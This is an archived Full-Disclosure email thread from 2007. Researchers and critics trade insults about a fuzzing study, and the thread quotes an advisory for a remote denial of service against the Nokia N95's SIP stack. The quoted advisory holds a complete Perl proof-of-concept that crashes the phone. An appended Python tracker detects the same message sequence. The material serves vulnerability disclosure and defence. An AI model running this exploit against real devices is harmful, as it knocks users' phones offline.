<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=windows-1252"
http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">I think you're missing his point. In fact I might be too,
but my take on it is this: you'd think two PhDs and a PhD student
might be able to do something a little more advanced than running a
fuzzer and reporting DoS conditions.
<br>
</blockquote>
Well, in fact, as part of our research we are working on smart
techniques for fuzzing. So, whenever we come up with something new,
the first thing to do is to test whether it works or not.
Hence the vulnerabilities we found. <br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">Do you guys even investigate the DoS to determine the root
cause? If ye did then that might be OK and considered PhD level. I
would think that a PhD level interpretation of this area might be for
instance..... running a fuzzer against a hardware phone and then
getting some form of code execution. Yes? No? Maybe? </blockquote>
We do not investigate the cause; as soon as we find a vulnerability we
try to see if we can replay it, and later send it to the appropriate
company to allow them to fix it. As I told you before, the
vulnerabilities found are just experimental results of our advances.<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">It looks to me like someone one of you guys built a VoIP
fuzzer (is it even a VoIP fuzzer or just SIP?)</blockquote>
In fact, KiF can be split in two (in a very simplistic way).<br>
1) A Generic Syntax Fuzzer able just to generate/parse messages. It
takes an ABNF as input and does the rest, respecting or not the ABNF
grammar. <br>
2) A Stateful fuzzer able to keep track of the remote state
machine and a local testing state machine.<br>
<br>
So, the first item can be useful for any non-flat ABNF grammar (e.g.
TCP won't work). Usually those grammars can be found in the RFCs. So,
unlike most other fuzzers, extensibility and precision are
easily achieved. The second item is totally dependent
on SIP at the moment, mostly due to the need for Dialog and
Transaction identification. However, we expect to generalize that in the
medium term.<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite"> and for the remainder of your doctoral studies you will
be purchasing equipment and hitting the 'Fuzz' button. As I said, if
you're gonna be submitting this kind of stuff to every list you can
then at least investigate the root cause, maybe then it'll provide some
slightly more interesting reading and perhaps benefit your thesis.
<br>
</blockquote>
I already replied to it.<br>
<br>
Concerning the comments from Reepex, I apologize for all these mails
that you received from us, but thanks to this list we had plenty of
good feedback on our work. As the purpose of the list is, among
other things, to disclose vulnerabilities, either we will have these permanent
fights or you can simply ignore us. However, thanks for your comments
on how to write better Perl code (I can accept comments on how to write
better English as well :). Either way, I will take a look at the Perl
advice before writing a new script. As Radu said earlier on, we are
not experts on Perl and personally not big fans. The idea was just to
show how to replay the problem.<br>
<br>
Humberto Abdelnur<br>
Phd student ;)<br>
<blockquote
cite="mid:28749c0e0712051410h70f7c1abv6743b65619771afd@mail.gmail.com"
type="cite">nnp<br>
<br>
-----BEGIN PGP SIGNATURE-----<br>
Version: GnuPG v1.4.7 (Darwin)<br>
Comment: <a moz-do-not-send="true" href="http://firegpg.tuxfamily.org">http://firegpg.tuxfamily.org</a><br>
<br>
iD8DBQFHV5DhbP10WPHfgnQRAtMNAJ43x7ZJDyVn0njZi2zTMQIQQoB6bgCeK8k7
<br>
addmL2c5Jm4LrlQvahnBrgY=<br>
=YX4u<br>
-----END PGP SIGNATURE-----<br>
<div class="gmail_quote">On Dec 5, 2007 11:57 AM, <<a
moz-do-not-send="true" href="mailto:state@loria.fr">state@loria.fr</a>>
wrote:<br>
<blockquote class="gmail_quote"
style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Hi Reepex,<br>
<br>
I do not understand why you are frustrated about a computer science degree.
Maybe someone got dropped out of a degree program and some psychological
trauma gets activated when seeing a Ph.D?<br>
<br>
Whether you like it or not, in order to get a computer science degree, you
will have to take classes, and most classes are taught by Ph.Ds.<br>
<br>
I will not argue with you on why I use the Ph.D in my signature, but if you
really want to know, look at our research papers published in academic
journals/conferences. (If you do not find them, I can send them to you.)
If you ever understand the contents, then you will understand what our
credentials are..:) This will probably never happen.<br>
<br>
At least I use a signature and a real name and do not hide behind a gmail
account.<br>
<br>
Meanwhile, try yourself to find at least one vulnerability and enjoy Perl
programming; it seems your computer science skills are somehow in this
area :)<br>
<br>
Greetings<br>
<br>
RS<br>
<br>
According to reepex <<a moz-do-not-send="true"
href="mailto:reepex@gmail.com">reepex@gmail.com</a>>:<br>
Selon reepex <<a moz-do-not-send="true"
href="mailto:reepex@gmail.com">reepex@gmail.com</a>>:<br>
<div>
<div class="Wj3C7c"><br>
> So almighty Phd what is your thesis exactly?<br>
><br>
> To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'<br>
><br>
> does this properly summarize your phd credentials?<br>
><br>
> I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of'<br>
><br>
> I am sure you will serve the academic community great one day when you teach "hacking" classes revolving around the latest editions of hacking exposed<br>
><br>
> On Dec 5, 2007 11:05 AM, Radu State <<a moz-do-not-send="true" href="mailto:State@loria.fr">State@loria.fr</a>> wrote:<br>
><br>
> > Nokia N95 cellphone remote DoS using the SIP Stack<br>
> ><br>
> > Severity:<br>
> ><br>
> > High – Denial of Service<br>
> ><br>
> > Hardware:<br>
> ><br>
> > Nokia N95<br>
> ><br>
> > Firmware:<br>
> ><br>
> > Tested version: Nokia RM-159 V 12.0.013<br>
> ><br>
> > Notification:<br>
> ><br>
> > Vulnerability found: 11 September 2007<br>
> > Contact Nokia Support: 12 September 2007 / No reply<br>
> > Contact Nokia Security Support: 19 September 2007 / No reply<br>
> ><br>
> > Vulnerability Synopsis:<br>
> ><br>
> > If the device has the SIP Phone client activated, a sequence of SIP messages puts the device in an inconsistent state where the user is not able to operate it anymore until it reboots.<br>
> ><br>
> > The sequence of messages consists of 2 different SIP Dialogs, where the first initiates an INVITE transaction but immediately closes it (in an anticipated manner), while the second initiates a normal INVITE transaction that triggers the vulnerability of the target.<br>
> ><br>
> > The sequence of messages is illustrated below.<br>
> ><br>
<pre>
> > X ------------------------- INVITE -----------------------&gt; Nokiav12
> > X &lt;---------------------- 100 Trying ---------------------- Nokiav12
> > X ------------------------- CANCEL -----------------------&gt; Nokiav12
> > X &lt;----------------- OK (to the Cancel) ------------------- Nokiav12
> > X &lt;---------------- 487 Request Terminated ---------------- Nokiav12
> >
> > --------New Dialog--------
> >
> > X ------------------------- INVITE -----------------------&gt; Nokiav12
> > X &lt;---------------------- 100 Trying ---------------------- Nokiav12
> > X &lt;---------------------- 180 Trying ---------------------- Nokiav12
> >
> > ---- The device does not work properly anymore ----
</pre>
> ><br>
> ><br>
> ><br>
> > Impact:<br>
> ><br>
> > A remote entity can take down all the services of the cell phone.<br>
> ><br>
> > Resolution:<br>
> ><br>
> > As we did not get any proper reply from Nokia about the subject, the best way will be to disable the SIP Client.<br>
> ><br>
> > Credits:<br>
> ><br>
> > Humberto J. Abdelnur (Ph.D Student)<br>
> > Radu State (Ph.D)<br>
> > Olivier Festor (Ph.D)<br>
> ><br>
> > This vulnerability was identified by the Madynes research team at INRIA Lorraine, using KiF, the Madynes VoIP fuzzer.<br>
> ><br>
> > <a moz-do-not-send="true" href="http://madynes.loria.fr/" target="_blank">http://madynes.loria.fr/</a><br>
> ><br>
> > Proof of Concept:<br>
> ><br>
> > A perl script (nokiav12.pl) is attached to this mail. Before launching it, the SIP phone has to be initialized on the target device.<br>
> ><br>
> > Command:<br>
> ><br>
> > perl nokiav12.pl &lt;dst_IP&gt; &lt;username&gt; &lt;SourceIp&gt; &lt;SourceUsername&gt;<br>
> ><br>
> > E.g. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu<br>
> ><br>
<pre>
> > #!/usr/bin/perl
> >
> > ##################################################
> > # Vulnerability discovered using KiF ~ Kiph      #
> > #                                                #
> > # Authors:                                       #
> > #   Humberto J. Abdelnur (Ph.D Student)          #
> > #   Radu State (Ph.D)                            #
> > #   Olivier Festor (Ph.D)                        #
> > #                                                #
> > # Madynes Team, LORIA - INRIA Lorraine           #
> > # http://madynes.loria.fr                        #
> > ##################################################
> >
> > use IO::Socket::INET;
> > use String::Random;
> >
> > die "Usage $0 &lt;targetIP&gt; &lt;targetUser&gt; &lt;attackerIP&gt; &lt;attackerUser&gt;"
> >     unless ($ARGV[3]);
> >
> > $targetIP     = $ARGV[0];
> > $targetUser   = $ARGV[1];
> > $attackerIP   = $ARGV[2];
> > $attackerUser = $ARGV[3];
> >
> > # UDP socket towards the target's SIP port, bound locally to 5060 as well
> > $socket = IO::Socket::INET->new(
> >     Proto     => 'udp',
> >     PeerPort  => 5060,
> >     PeerAddr  => $targetIP,
> >     LocalPort => 5060)
> >     or die "Cannot create socket: $!";
> >
> > # random Call-ID and CSeq for the first dialog
> > $foo    = new String::Random;
> > $callid = $foo->randpattern("CCccnCn");
> > $cseq   = $foo->randregex('\d\d\d\d');
> >
> > # SDP body; every line ends in CRLF (the "\r" plus the literal newline)
> > $sdp = "v=0\r
> > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> > s=-\r
> > c=IN IP4 $attackerIP\r
> > t=0 0\r
> > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> > a=sendrecv\r
> > a=ptime:20\r
> > a=maxptime:200\r
> > a=fmtp:96 mode-change-neighbor=1\r
> > a=fmtp:18 annexb=no\r
> > a=fmtp:98 0-15\r
> > a=rtpmap:96 AMR/8000/1\r
> > a=rtpmap:0 PCMU/8000/1\r
> > a=rtpmap:8 PCMA/8000/1\r
> > a=rtpmap:97 iLBC/8000/1\r
> > a=rtpmap:18 G729/8000/1\r
> > a=rtpmap:98 telephone-event/8000/1\r
> > a=rtpmap:13 CN/8000/1\r
> > ";
> >
> > $sdplen = length $sdp;
> >
> > # first dialog: INVITE ...
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > From: &lt;sip:$attackerUser\@$attackerIP&gt;;tag=1\r
> > To: &lt;sip:$targetUser\@$targetIP&gt;\r
> > Call-ID: $callid\@$attackerIP\r
> > CSeq: $cseq INVITE\r
> > Max-Forwards: 70\r
> > Contact: &lt;sip:$attackerUser\@$attackerIP&gt;\r
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
> > Content-Type: application/sdp\r
> > Content-Length: $sdplen\r
> > \r
> > $sdp";
> > $socket->send($msg);
> >
> > # ... wait for the 100 Trying ...
> > $text = '';
> > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ) {
> >     $socket->recv($text, 1024, 0);
> > }
> >
> > # ... then CANCEL it right away (same branch, Call-ID and CSeq number)
> > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > From: &lt;sip:$attackerUser\@$attackerIP&gt;;tag=1\r
> > To: &lt;sip:$targetUser\@$targetIP&gt;;tag=1\r
> > Call-ID: $callid\@$attackerIP\r
> > CSeq: $cseq CANCEL\r
> > Max-Forwards: 70\r
> > Content-Length: 0\r
> > \r
> > ";
> > $socket->send($msg);
> >
> > sleep(1);
> >
> > # second dialog: a normal INVITE with fresh Call-ID and CSeq
> > $callid = $foo->randpattern("CCccnCn");
> > $cseq   = $foo->randregex('\d\d\d\d');
> > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> > From: &lt;sip:$attackerUser\@$attackerIP&gt;;tag=2\r
> > To: &lt;sip:$targetUser\@$targetIP&gt;\r
> > Call-ID: $callid\@$attackerIP\r
> > CSeq: $cseq INVITE\r
> > Contact: &lt;sip:$attackerUser\@$attackerIP&gt;\r
> > Max-Forwards: 70\r
> > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
> > Content-Type: application/sdp\r
> > Content-Length: $sdplen\r
> > \r
> > $sdp";
> > $socket->send($msg);
</pre>
> ><br>
> ><br>
> > _______________________________________________
<br>
> > Full-Disclosure - We believe in it.<br>
> > Charter: <a moz-do-not-send="true"
href="http://lists.grok.org.uk/full-disclosure-charter.html"
target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
> > Hosted and sponsored by Secunia - <a moz-do-not-send="true"
href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>
> ><br>
><br>
<br>
<br>
</div>
</div>
</blockquote>
</div>
<br>
<br clear="all">
<br>
-- <br>
<a moz-do-not-send="true" href="http://www.smashthestack.org">http://www.smashthestack.org</a><br>
<a moz-do-not-send="true" href="http://www.unprotectedhex.com">http://www.unprotectedhex.com</a>
<br>
<br>
</blockquote>
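<br>
The two-dialog sequence in the quoted advisory (INVITE, 100 Trying, CANCEL, 200 OK to the CANCEL, 487, then a fresh INVITE) and the stateful tracking KiF is described as doing can both be shown from the receiving side. The Python below is an added example written for this page; it is not code from the thread, from KiF or from the Madynes team. It is a minimal SIP message parser plus a per-Call-ID INVITE transaction tracker, as a SIP proxy or endpoint log monitor might run it, which flags a source that sends a new INVITE shortly after cancelling a still-provisional one. The messages, their timings, the addresses (192.0.2.x), the Call-IDs and the window sizes are all constructed placeholders.<br>

```python
import re
from collections import defaultdict

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) SIP/2\.0$")
STATUS_LINE = re.compile(r"^SIP/2\.0 (\d{3}) ?(.*)$")
REQUIRED = ("via", "from", "to", "call-id", "cseq")


def parse_sip(raw):
    """Parse one SIP message into kind, method/status, lower-cased headers and body;
    malformed input raises ValueError so a monitor fed fuzzer output fails cleanly."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    msg = {"headers": {}, "body": body}
    if m := REQUEST_LINE.match(start):
        msg.update(kind="request", method=m.group(1), uri=m.group(2))
    elif m := STATUS_LINE.match(start):
        msg.update(kind="response", status=int(m.group(1)), reason=m.group(2))
    else:
        raise ValueError("not a SIP start line: %r" % start)
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        msg["headers"][name.strip().lower()] = value.strip()
    if any(h not in msg["headers"] for h in REQUIRED):
        raise ValueError("missing mandatory header (need %s)" % ", ".join(REQUIRED))
    return msg


def via_host(msg):
    """Sender host from the top Via ('SIP/2.0/UDP 192.0.2.10:5060;branch=..' -> '192.0.2.10').
    IPv6 literals are out of scope for this demonstration."""
    return msg["headers"]["via"].split()[1].split(";")[0].split(":")[0]


class InviteTracker:
    """Per-Call-ID INVITE transaction state plus, per source host, the times of INVITEs
    that were CANCELled while still provisional. A fresh INVITE from a source with a
    recent early cancel is the shape of the advisory's two-dialog sequence."""

    def __init__(self, early_window=2.0, reinvite_window=10.0):
        self.early_window = early_window        # CANCEL within this many s of INVITE = "early"
        self.reinvite_window = reinvite_window  # look-back for a new INVITE after an early cancel
        self.tx = {}                            # call-id -> {"state", "src", "t_invite"}
        self.early_cancels = defaultdict(list)  # src host -> [time of early CANCEL, ...]
        self.findings = []

    def feed(self, raw, t):
        """Process one message seen at time t (seconds); returns the parsed message."""
        msg = parse_sip(raw)
        callid = msg["headers"]["call-id"]
        tx = self.tx.get(callid)
        if msg["kind"] == "request" and msg["method"] == "INVITE":
            src = via_host(msg)
            recent = [tc for tc in self.early_cancels[src] if t - tc <= self.reinvite_window]
            if recent and tx is None:
                self.findings.append("%s: INVITE in new dialog %s %.1fs after an early-cancelled INVITE"
                                     % (src, callid, t - recent[-1]))
            self.tx[callid] = {"state": "proceeding", "src": src, "t_invite": t}
        elif msg["kind"] == "request" and msg["method"] == "CANCEL":
            if tx and tx["state"] == "proceeding":
                tx["state"] = "cancelled"
                if t - tx["t_invite"] <= self.early_window:
                    self.early_cancels[tx["src"]].append(t)
        elif (msg["kind"] == "response" and tx and msg["status"] >= 200
              and msg["headers"]["cseq"].endswith("INVITE")):
            # only a final response to the INVITE itself ends the transaction; the 200 OK to the CANCEL does not
            tx["state"] = "terminated" if msg["status"] >= 300 else "confirmed"
        return msg


# Constructed sample trace following the advisory's diagram; addresses are placeholders.
ATTACKER, PHONE = "192.0.2.10", "192.0.2.20"


def build_request(method, call_id, cseq, branch):
    """Request as the advisory's X would send it (SDP body omitted; irrelevant to the tracker)."""
    return ("%s sip:phone@%s SIP/2.0\r\nVia: SIP/2.0/UDP %s;branch=%s\r\nFrom: <sip:x@%s>;tag=1\r\n"
            "To: <sip:phone@%s>\r\nCall-ID: %s\r\nCSeq: %d %s\r\nMax-Forwards: 70\r\nContent-Length: 0\r\n\r\n"
            % (method, PHONE, ATTACKER, branch, ATTACKER, PHONE, call_id, cseq, method))


def build_response(status, reason, call_id, cseq, method, branch):
    """Response as the phone would return it to X (Via echoed from the request)."""
    return ("SIP/2.0 %d %s\r\nVia: SIP/2.0/UDP %s;branch=%s\r\nFrom: <sip:x@%s>;tag=1\r\n"
            "To: <sip:phone@%s>;tag=9\r\nCall-ID: %s\r\nCSeq: %d %s\r\nContent-Length: 0\r\n\r\n"
            % (status, reason, ATTACKER, branch, ATTACKER, PHONE, call_id, cseq, method))


def advisory_trace():
    """(time, message) pairs in the advisory's order; the times are constructed."""
    c1, c2 = "a1b2c3@" + ATTACKER, "d4e5f6@" + ATTACKER
    return [(0.0, build_request("INVITE", c1, 1, "z9hG4bK1")),
            (0.1, build_response(100, "Trying", c1, 1, "INVITE", "z9hG4bK1")),
            (0.2, build_request("CANCEL", c1, 1, "z9hG4bK1")),
            (0.3, build_response(200, "OK", c1, 1, "CANCEL", "z9hG4bK1")),
            (0.4, build_response(487, "Request Terminated", c1, 1, "INVITE", "z9hG4bK1")),
            (1.4, build_request("INVITE", c2, 2, "z9hG4bK2")),  # second dialog
            (1.5, build_response(100, "Trying", c2, 2, "INVITE", "z9hG4bK2")),
            (1.6, build_response(180, "Ringing", c2, 2, "INVITE", "z9hG4bK2"))]


def run_tracker(trace=None):
    """Feed a trace (default: the advisory's) through a fresh tracker and return it."""
    tracker = InviteTracker()
    for t, raw in (advisory_trace() if trace is None else trace):
        tracker.feed(raw, t)
    return tracker
```

<code>run_tracker().findings</code> holds one alert, raised when the second dialog's INVITE arrives, while a CANCEL that comes long after its INVITE (a caller simply giving up) produces none. A real proxy would log or rate-limit on such a hit rather than drop the call outright, since legitimate redials after a cancelled attempt look the same on the wire; the value of the tracker is that it keys on transaction state (a CANCEL against a still-provisional INVITE) rather than on message counts alone.<br>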
</body>
</html>